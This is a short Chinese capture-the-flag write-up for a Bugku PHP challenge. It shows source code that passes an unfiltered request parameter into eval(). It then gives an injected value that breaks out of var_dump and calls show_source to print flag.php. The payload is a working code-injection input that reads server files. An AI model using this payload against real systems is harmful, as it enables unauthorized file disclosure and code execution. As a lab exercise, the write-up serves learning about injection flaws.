Bugku_CTF Writeup 之 文件包含(60)
阿新 • • 發佈:2018-09-03
命令 line ati 輸入 bsp val 進行 pos 獲取
題目說明:
地址:http://120.24.86.145:8003/
1. 打開頁面發現給出了php源碼
1 <?php 2 include "flag.php"; 3 $a = @$_REQUEST[‘hello‘]; 4 eval( "var_dump($a);"); 5 show_source(__FILE__); 6 ?>
2.flag應該在flag.php裏,想辦法將其爆出
(1)a變量由$_REQUEST變量獲取,可以用GET或POST方法為hello賦值進而為$a賦值
(2)程序並未對hello的輸入進行判斷過濾
(3)eval函數中執行的命令進而可以被$a的值所決定
3.類似於構造SQL註入語句,構造hello的值為 1);show_source("flag.php);var_dump(1
GET方法傳參後,eval函數實際執行的命令是 var_dump(1);show_source("flag.php");var_dump(1);
即可得到flag.php的源碼並得到flag
Bugku_CTF Writeup 之 文件包含(60)